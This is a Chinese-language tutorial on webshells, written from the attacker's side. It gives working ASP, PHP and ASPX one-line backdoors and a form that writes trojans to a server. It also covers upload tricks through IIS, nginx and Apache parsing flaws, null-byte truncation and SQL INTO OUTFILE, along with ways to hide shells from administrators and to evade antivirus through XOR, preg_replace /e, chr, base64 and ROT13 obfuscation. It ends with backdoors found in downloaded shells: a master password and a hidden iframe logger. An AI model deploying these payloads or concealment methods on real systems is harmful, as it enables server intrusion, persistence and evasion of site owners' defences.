一、什么是webshell
- webshell簡介
webshell,顧名思義:web指的是在web服務器上,而shell是用腳本語言編寫的腳本程序,webshell就是就是web的一個管理工具,可以對web服務器進行操作的權限,也叫webadmin。webshell一般是被網站管理員用於網站管理、服務器管理等等一些用途,但是由於webshell的功能比較強大,可以上傳下載文件,查看數據庫,甚至可以調用一些服務器上系統的相關命令(比如創建用戶,修改刪除文件之類的),通常被黑客利用,黑客通過一些上傳方式,將自己編寫的webshell上傳到web服務器的頁面的目錄下,然后通過頁面訪問的形式進行入侵,或者通過插入一句話連接本地的一些相關工具直接對服務器進行入侵操作。
- webshell的分類
webshell根據腳本可以分為PHP腳本木馬,ASP腳本木馬,也有基於.NET的腳本木馬和JSP腳本木馬。在國外,還有用python腳本語言寫的動態網頁,當然也有與之相關的webshell。
根據功能也分為大馬與小馬,小馬通常指的一句話木馬,例如:<%eval request(“pass”)%>通常把這句話寫入一個文檔里面,然后文件名改成xx.asp。然后傳到服務器上面。這里eval方法將request(“pass”)轉換成代碼執行,request函數的作用是應用外部文件。這相當於一句話木馬的客戶端配置。服務器配置(即本機配置):
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<form action=http://主機路徑/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//建立流對象
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //將木馬內容以覆蓋文件的方式寫入newmm.asp,2就是已覆 蓋的方式
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "newmm.asp" //轉向newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>(添入生成木馬的內容)
</textarea>
<BR>
<center>
<br>
<input type=submit value=提交>
|
這里通過提交表單的方式,將木馬提交上去,具體的做法是將定義一個對象IP,然后以文本方式寫入newvalue里面的內容(newvalue的內容在textarea定義),寫入以覆蓋的方式產生ASP文件,然后執行這個腳本。其中客戶端中的value代表的是表單的名字,必須跟服務端(本機)的post提交中的表單名一樣,所以這里的value可以為任意字符,相當於一個密碼之類的東西,但是這個‘密碼’是明文的,可以截取下來。PHP的一句話原理跟以上的原理差不多,就是語言的差別導致語法不同。這就是小馬的基本工作原理。
大馬的工作模式簡單的多,他沒有客戶端與服務端的區別,就是一些腳本大牛直接把一句話木馬的服務端整合到了一起,通過上傳漏洞將大馬上傳,然后復制該大馬的url地址直接訪問,在頁面上執行對web服務器的滲透工作。但是有些網站對上傳文件做了嚴格的限制,因為大馬的功能較多,所以體積相對較大,很有可能超出了網站上傳限制,但是小馬的體積可以控制(比如把代碼復制很多遍,或者在一個亂碼文件中夾入代碼),但是小馬操作起來比較繁瑣,可以先上傳小馬拿到webshell,然后通過小馬的連接上傳大馬拿到服務器。
二、如何上傳webshell
1.解析漏洞上傳
現在對於不同的web服務器系統對應的有不同的web服務端程序,windows端主流的有iis,linux端主流的有nginx。這些服務對搭建web服務器提供了很大的幫助,同樣也對服務器帶來隱患,這些服務器上都存在一些漏洞,很容易被黑客利用。
(1)iis目錄解析漏洞
比如:/xx.asp/xx.jpg
雖然上傳的是JPG文件,但是如果該文件在xx.asp文件夾下,那個iis會把這個圖片文件當成xx.asp解析,這個漏洞存在於iis5.x/6.0版本。
(2)文件解析漏洞
比如:xx.asp;.jpg。在網頁上傳的時候識別的是jpg文件,但是上傳之后iis不會解析;之后的字符,同樣會把該文件解析成asp文件,這個漏洞存在於iis5.x/6.0版本。
(3)文件名解析
比如:xx.cer/xx.cdx/xx.asa。在iis6.0下,cer文件,cdx文件,asa文件都會被當成可執行文件,里面的asp代碼也同樣會執行。(其中asa文件是asp特有的配置文件,cer為證書文件)。
(4)fast-CGI解析漏洞
在web服務器開啟fast-CGI的時候,上傳圖片xx.jpg。內容為:
|
1
|
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>');?>
|
這里使用的fput創建一個shell.php文件,並寫入一句話。訪問路徑xx.jpg/.php,就會在該路徑下生成一個一句話木馬shell.php。這個漏洞在IIS 7.0/7.5,Nginx 8.03以下版本存在。語言環境:PHP,prel,Bourne Shell,C等語言。
*注:fast-CGI是CGI的升級版,CGI指的是在服務器上提供人機交互的接口,fast-CGI是一種常駐型的CGI。因為CGI每次執行時候,都需要用fork啟用一個進程,但是fast-CGI屬於激活后就一直執行,不需要每次請求都fork一個進程。比普通的CGI占的內存少。
(5)apache解析漏洞
apache解析的方式是從右向左解析,如果不能解析成功,就會想左移動一個,但是后台上傳通常是看上傳文件的最右的一個后綴,所以根據這個,可以將馬命名為xx.php.rar,因為apache解析不了rar,所以將其解析為php,但是后台上傳點就將其解析為rar,這樣就繞過了上傳文件后綴限制
2.截斷上傳
在上傳圖片的時候,比如命名1.asp .jpg(asp后面有個空格),在上傳的時候,用NC或者
burpsuite抓到表單,將上傳名asp后面加上%00(在burpsuite里面可以直接編輯HEX值,空格的HEX值為20,將20改為00),如果HEX為00的時候表示截斷,20表示空格,如果表示截斷的時候就為無視腳本中的JPG驗證語句,直接上傳ASP。
3.后台數據庫備份
在一些企業的后台管理系統中,里面有一項功能是備份數據庫(比如南方cms里面就有備份數據庫的功能)。可以上傳一張圖片,圖片里面含有一句話木馬,或者將大馬改成jpg格式,然后用數據庫備份功能,將這張圖片備份為asp等其他內容可以被解析為腳本語句的格式,然后再通過web訪問就可以執行木馬了,但是這種方法很老了,現在大多數的cms已經把這種備份的功能取消了,或者禁用了。
4.利用數據庫語句上傳
(1) mysql數據庫into outfile
這種方式的前提必須是該網站有相應的注入點,而且當前用戶必須要有上傳的權限,而且必須有當前網頁在服務器下的絕對路徑。方法是用聯合查詢,將一句話木馬導入到網站下邊的一個php文件中去,然后使用服務端連接該網站。但是上述方法條件過於苛刻,一般遇到的情況很少。
(2)建立新表寫入木馬
一些開源cms或者自制的webshell會有數據庫管理功能,在數據庫管理功能里面有sql查詢功能,先使用create table shell(codetext);創建一個名字叫做shell的表,表里面有列明叫做code,類型為text。然后使用insert into shell(code) values(‘一句話馬’),這里講shell表中的code列賦值為一句話的馬,然后通過自定義備份,將該表備份為x.php;x然后就被解析成為php然后執行了,這里不是x.php;x就一定能夠解析為php,不同的web服務器上面的服務程序不同,然后過濾規則也不同,可能會使用其他的方式。
(3)phpMyadmin設置錯誤
phpMyadmin用來管理網站數據庫的一個工具,其中config.inc.php為其配置文件,在查看的該文件的時候,如果$cfg[‘Servers’][$i][‘auth_type’]參數的值設置沒有設置(默認為config)說明在登陸數據庫的時候沒有做相應的驗證,可以直接連入數據庫,而且在Mysql在一些版本下面默認登陸都是以root用戶進行登陸(即管理員),所以登陸進去為最大權限。但是root一般只能本地登陸,所以必須創建一個遠程登陸用戶。用遠程登陸用戶登陸之后,創建一個表,然后再將一句話木馬寫入。
三、webshell的“安全”
1.關於webshell的隱藏
在上傳webshell的時候必須要進行webshell的隱藏工作。隱藏webshell,第一個目的是不讓網站管理員發現馬將其刪掉,第二個目的是為了不被其他的Hacker發現了這個文件並加以利用。
(1)大馬的隱藏
①不死僵屍
windows系統存在系統保留文件夾名,windows不允許用這些名字來命名文件夾保留文件夾:aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt。但是這些可以使用windows的copy命令創建,比如:
|
1
|
c:\>copy 3.asp \\.\C:\aux.asp
|
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image020.png
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image022.jpg
在c盤中創建一個aux.asp。這個文件無法在圖像界面下刪除。
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image023.png
要刪除必須使用del命令。
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image024.png
刪除了之后是沒有提示的,但是文件確實沒有了。
當然用這樣的方法雖然可以創建一個圖形界面無法刪除的webshell,但是如果直接放在網頁根目錄下,被有經驗的網管看到還是回刪除的。
②clsid隱藏
windows每一個程序都有一個clsid,如果將一個文件夾命名為x.{程序clsid},然后輸入一下兩條命令:
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image026.jpg
創建后
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image027.png
點開進入的是控制面板,但是其實該文件還是文件夾,里面還存在大馬,而且創建一個這樣一個帶有clsid的文件夾將其命名為相應的程序可以迷惑網絡管理員的實現,比如進入回收站文件夾中創建這樣一個帶有回收站clsid的文件夾,在里面里面再copy一個保留字asp,還可以使用
|
1
|
attrib +h +s +r +d/s /d
|
修改該文件的屬性,將其隱藏,一般windows都是默認不顯示隱藏文件的,而且回收站文件夾是自動創建的,這樣可以達到隱藏一個不死webshell到服務器中去。
③驅動隱藏技術
原理是在於,在windows文件系統中,打開文件夾的時候系統會發送一個IRP_MJ_DIRECTORY_CONTROL函數,這個函數可以分配一個緩沖區,將該文件夾下的子文件夾遍歷處理得到的信息存放至緩沖區,在遍歷的時候,尋找匹配的文件名,如果文件名匹配,就繞過當前文件夾或者文件,對於繞過的原理,我查詢了下代碼,根據我的理解,它是根據將遍歷的指針在查詢到目標文件的時候,加上該文件的偏移量,不掃描目標文件夾,直接跳過。
對於這種技術的實施,雖然網上很多C的源碼,但是操作起來有一定的困難,因為頭文件的支持,還有系統的支持(不同系統的文件系統會不同),在網上查找到了Easy File Locker程序,需要將其安裝至web服務器上,對目標文件設置權限。
|
1
|
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image028.png
|
權限的設置有可讀accessable,可寫writable,可刪deletable,可見visible。
|
1
|
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image030.jpg
|
上圖可以看到我們將其隱藏了,如前文所說,因為直接繞過了遍歷,那么訪問絕對路徑卻可以訪問。我的理解是:
|
1
2
3
4
|
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
|
這4個文件代替了遍歷查詢,要訪問隱藏后的文件,輸入絕對路徑並不是應用絕對路徑查詢,而是通過上面4個文件進行的查詢,相當於給隱藏文件做了一個單獨的驅動。
為了不被管理員發現,可以將Easy FileLocker的程序刪除,但是不能刪除上述4個文件。刪除程序后,輸入絕對路徑還是可以訪問,就達到了隱藏后門的作用
④注冊表隱藏
注冊表路徑:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL
在這個路徑下有一個CheckedValue的鍵值,把他修改為0,如果沒有CheckValue這個key直接創建一個,將他賦值為0,然后創建的隱藏文件就徹底隱藏了,即時在文件夾選項下把“顯示所有文件”也不能顯示了。
(2)一句話木馬的隱藏
①頭文件包含隱藏
在web里面的一些腳本文件中,有些文件里面有包含語句,可以利用這種包含方法包含一句話文件,在訪問這個頁面會直接調用這些一句話。
asp包含語句:<!–#includefile=”文件路徑”–>,直接填入路徑,文件路徑是web服務器上的路徑。
可以使用站長住手將一句話的NTFS流小馬寫入圖片里面,將路徑的‘\’改‘:’寫入之后圖片是顯示不了的,然后找到web服務器上的一個asp文件,在文件的開始部分寫上include語句,<!–#includefile=”inc:1.jpg”–>。文件包含可以解析NTFS流為asp,包含之后,我們訪問那個asp文件就包含了一句話,這樣就隱藏了一句話。
php包含語句:
|
1
|
<?php include($include);?>
|
這里的$include可以是外部路徑比如:
這個aaa上的1.php內容為
|
1
|
<?php include($include);?>
|
,表示包含。bbb是外部服務器的,前提是這個服務器不能支持PHP。否則將會在bbb這個服務器上執行hehe.php(即一句話馬),而aaa不執行。
②配置文件隱藏一句話(PHP)
在拿到PHP的webshell之后,可以利用php.ini隱藏文件,編輯配置文件,其中一個項功能是將某一個文件的內容添加到任意界面的頁眉頁腳:
auto_prepend_file =hehe.php
然后看
include_path = “E:\PHPnow-1.5.6\htdocs;”
這個配置信息表示加載頁眉頁腳的文集位置,path規則是”\path1;\path2″,表示將path1路徑的文件夾下的頁眉頁腳文件添加到path中的文件中去,因為這里是一個‘.’表示根路徑,這里就相當於添加到了主頁上面去了,然后hehe.asp文件里面寫上一句話,就可以通過php添加頁眉的共能,將一句話寫入網站首頁。
③404小馬
404小馬在訪問的時候顯示出來一個404頁面不存在的頁面,但是實際上木馬代碼已經執行,一般都是按5次shift可以將它調用出來。
四、關於webshell的免殺一句話免殺
1.構造法繞過檢測(PHP)
一般的檢測程序會過濾這樣”_POST”,”system”,”call_user_func_array”這樣的字符,這個時候可以用構造法繞過一些檢測程序,基本原理是,php每一個字符都都對應了一個二進制的值,可以采用異或的方式,讓馬中的一個字符用兩個字符異或后的值來代替。
比如像一下代碼
|
1
2
3
4
5
6
7
8
|
<?php
@$_++; // 這里++讓’_’自加1
$__=("#"^"|"); // _
$__=("."^"~"); // P
$__=("/"^"`"); // O
$__=("|"^"/"); // S
$__=("{"^"/"); // T
?>
|
然后構造與一句話可以寫為
|
1
2
3
|
<?php @$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // $__的值為_POST
@${$__}[!$_](${$__}[$_]);?>
|
// 結果為
@$_POST[0]($POST[1])
!$_表示1的相反,在語言里面1代表真,反過來就是0(假)
但是這樣的繞過方法相當弱,仔細想一下,就算是兩個字符的二進制值異或,但是我們要用某個字符,還是應用那個字符的值,比如
|
1
|
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")
|
的二進制值與_POST字符的值一樣的,要是檢測程序會檢測二進制碼的值,還是會被殺掉。
2.正則表達式代替法(PHP)
php中有一個函數preg_replace()函數,這個函數可以實現正則表達式的替換工作。用替換繞過檢測系統還需要php腳本語言里面的一個函數特性,函數在調用的時候,如果函數里面的形參賦的值里面含有命令,就會執行這個命令。
|
1
2
3
4
|
<?php
function funfunc($str){}
echopreg_replace("/<title>(.+?)<\/title>/ies",'funfunc("\1")', $_POST["cmd"]);
?>
|
上述代碼就是替代的一個過程,首先創建一個空函數,然后使用preg_replace函數替換表單cmd中的<title></title>(這里是html里面表示主題)為funfunc,將post表單中的值寫成
<title>{${phpinfo()}}</title>
(當然這里的phpinfo()可以換成其他的命令),通過置換,就會變成
funfunc({${phpinfo()}})
由於${}可以解析{}中的內容,所以這里的phpinfo就可以順利執行了。
3.即時生成法(PHP)
在使用頭文件包含的時候,所包含頭文件php很容易被掃描器掃描到,這時候可以使用file_put_content創建一個文件,里面寫如php的一句話馬。在訪問之前先生成馬,但是這個函數比較敏感,很容易被殺。
4.回避法(asp)
因為有的asp服務器為了防止一句話馬,會過濾<%,%>,可以使用:
|
1
|
<scriptlanguage=VBScriptrunat=server>execute request("cmd")</Script>
|
功能相同,就是換個形式。
回避特定腳本語言:aspx一句話
|
1
|
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script>
|
這里使用C#語言寫一句話馬。
5.拆分法(asp)
將<%eval request(“x”)%>拆分為<%Y=request(“x”)%><%eval(Y)%>,雖然繞過的可能性很小,但是也是一種繞過手法,也許有的服務器,做了很多高大上的掃描方式,但是遺漏小的問題。
還有拆分法加強版:
|
1
2
|
<%IfRequest("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>
|
以上兩句使用了if一句將其分開,中心思想將敏感字符拆分,因為一般asp特征碼為eval(request或者execute(request,拆分了之后檢測不到特征碼,就直接繞過了。
6.亂碼變形(ANSI->Unicode加密)
|
1
|
<%eval request("#")%>變形為“┼攠數畣整爠煥敵瑳∨∣┩愾”
|
|
1
|
eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
|
上面一行代碼是采用了ascii加密的方法,chr(114)代表的是ascii中的編號為114個那個字符,即r。上述代碼轉換后的代碼為
|
1
|
<%eval (eval(request("brute"))%>
|
7.大馬免殺
(1)base4code編碼
大馬的免殺可以通過將大馬的代碼進行壓縮,壓縮之后在進行base4的加密算法,然后在大馬的末尾添加
|
1
|
@eval(gzinflate(base64_decode($code)));
|
就可以執行腳本了。其中,$code變量是用來存放base4的code碼,執行的時候先gzinflate解壓,在eval執行。其實這種不能真正意義上的免殺,以為base4code和eval還是回被列入特征碼行列,在過掃描器的時候同樣會被殺掉。
(2)ROT13編碼(php)
str_rot13是php用來編碼的一個函數。可以利用它來編碼腳本代碼來繞過特征碼的檢測,比如。
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image031.png
圖中的strrev函數是用來反轉字符,為了逃過特征碼的檢測,還特地將字符用’.’號隔開。
圖中3個str_rot13所加密的字符依次是gzinflate,str_rot13,base64_decode,相當於三重加密,而且也回避了gzinflate,base64_decode這兩個特征碼。但是沒有回避str_rot13。有可能有的殺軟會將str_rot13也作為特征碼。
ROT13成為回轉13,就是講當前字符在字母表中的位置值減去13對應的字符加密。加密兩次就回到原來的值了。但是由於算法固定,加密的強度也不強。而且破解的方式極為簡單,只要再加密一邊就可以了。
(3)其他編碼
一般殺軟和掃描器都會用特征碼來判斷是否有病毒,在對大馬或者小馬,一句話馬做免殺處理的時候,一般都會用php或者asp腳本中加密類的函數來加密繞過掃描器(比如base4,rot13等),但是我覺得可以自己編寫加密算法,然后使用自己編寫的加密算法加密腳本代碼就可以繞過一些特征碼的。可以使用一些凱撒密碼,移位加密等加密手段的思想,寫一段加密算法,然后將腳本代碼進行加密,然后base4,rot3這樣的特征碼就會消失,或者可以不那么麻煩,直接用自制的加密算法加密特征碼,然后再使用的時候將其解密就行了。
還可以使用DES,RSA這樣的密鑰加密算法也可以,一般的大馬都會有一個密碼的登陸框,可以講登陸腳本的密碼跟解密密鑰聯動起來,輸入正確的密碼后才能夠解析,一方面是為了逃過掃描器與殺軟的查殺,另一方便,這個大馬即使被別人拿到了,也無法解密,看到其中的源碼。
五、關於webshell的后門
一般網上下載的大馬或多或少的都會有后門,這些后門直接導致了我們拿的網站被別人順帶拿走了,所以在網上下載的大馬必須先檢查有沒有后門。
比如這里的萬能密碼:
|
1
2
3
4
5
6
7
|
end function
if session("hehe")<>userpassthen
ifrequest.form("pass")<>"" then
if request.form("pass")=userpassor request.form("pass")="1111111" Then
session("hehe")=userpasss
response.redirect url
else
|
這里
|
1
|
request.form("pass")=userpass
|
原本是為了將pass的值進行驗證,如果輸入的pass值等於userpass的情況,就代表驗證成功,但是后面
|
1
|
orrequest.from(“pass”)=”1111111”
|
表示如果輸入的pass值為1111111,也可以登錄大馬。當然,這個地方不可能會這么簡單,原作者完全可以把userpass賦值成為兩個,添加一個userpass改變的觸發條件,在他登錄的時候觸發這個條件(比如說如果登錄失敗的時候將觸發userpass值的更新),這樣就可以添加一個后面,而且觸發條件的代碼與驗證代碼分隔的較遠,也不好查找,這個時候就需要我們把大馬的代碼逐行分析。
然后再用框架掛馬:
|
1
|
<iframe src=后門地址 width=0 height=0></iframe>
|
這個地方將鏈接的地址寬度和高度全設置為0,就該頁面就隱藏了。里面的“后門地址”指向自己的腳本收信器,最后將收信腳本放到自己搭建的一個公網服務器上面,收信腳本如下:
|
1
2
3
4
5
6
7
8
|
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
|
其中
|
1
|
url=Request.ServerVariables("HTTP_Referer")
|
表示請求的字符轉內容,即大馬的url地址,然后把url地址保存到當前目錄的hehe.txt。
要提出這種后門首先必須先要破壞大馬第二種密碼驗證,即萬能密碼。刪除相關的功能代碼,然后再查找有沒有asp大馬頁面有沒有例如width=0 height=0這樣的隱藏url,查找出來將其刪除。